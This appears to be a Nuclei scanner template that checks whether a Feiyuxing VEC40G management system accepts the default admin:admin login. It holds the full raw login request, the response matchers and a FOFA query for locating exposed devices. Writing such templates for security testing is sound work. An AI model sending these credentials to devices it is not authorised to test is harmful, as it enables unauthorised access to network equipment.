id: feiyuxing-default-login

info:
  name: Feiyuxing Enterprise-Level Management System - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Attackers can log in through admin:admin, check the system status, and configure the device.
  reference:
    - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
  classification:
    cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: feiyuxing
    product: vec40g
    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
  tags: feiyuxing,default-login,iot

http:
  - raw:
      - |
        POST /send_order.cgi?parameter=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        {"username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"msg":"ok"'
          - '"type":'
        condition: and

      - type: word
        part: header
        words:
          - 'hash_key='

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074297f420567734530e3e06210d97e79b4ba5b4096b329828bf4bac85e14f0d5022100ba85c2e94ad3881d188a2a9180839f0f6f55c49823292e9ec3d83bed559986fb:922c64590222798bb761d5b6d8e72950